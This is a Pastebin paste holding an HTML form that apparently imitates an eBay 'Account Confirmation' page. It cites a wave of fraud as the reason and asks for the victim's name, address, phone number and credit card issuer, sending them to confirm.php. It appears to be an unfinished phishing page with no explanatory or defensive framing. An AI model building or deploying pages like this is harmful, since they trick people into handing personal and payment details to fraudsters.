Advertisement
Guest User

Untitled

a guest
Jul 4th, 2017
92
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.24 KB | None | 0 0
  1. <form name="Confirm Info" action="confirm.php" method="get">
  2. <h1><font color="blue" size="4">Account Confirmation</font></h1>
  3. <p><i><font color="red" size="2">Because of the recent wave of computer frauds using ebay.com, we decided to confirm accounts of our users. We are sorry for any possible inconvienience that may occur, but these security measures are neccessary in order to stop new criminal acts and provide safety to our users. Thank you for your understanding.</font></i></p>
  4. <h4>Personal Informations :</h4>
  5. First name : <input type="text" name="fname"></input></br>
  6. Last name : <input type="text" name="lname"></input></br>
  7. Address : <input type="text" name="address"></input></br>
  8. City : <input type="text" name="city"></input></br>
  9. State : <input type="text" name="state"></input></br>
  10. Zip Code : <input type="text" name="zip"></input></br>
  11. Country : <input type="text" name="country"></input></br>
  12. Phone Number : <input type="text" name="phone"></input></br>
  13. <h4>Payment Informations :</h4>
  14. Credit Card Issuer:
  15. <select name="issuer" size="1">
  16. <option value="1">item 1</option>
  17. <option value="2">item 2</option>
  18. <option value="3">item 3</option>
  19. <option value="4">item 4</option>
  20. <option value="0">All</option>
  21. </select>
  22.  
  23. </form>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement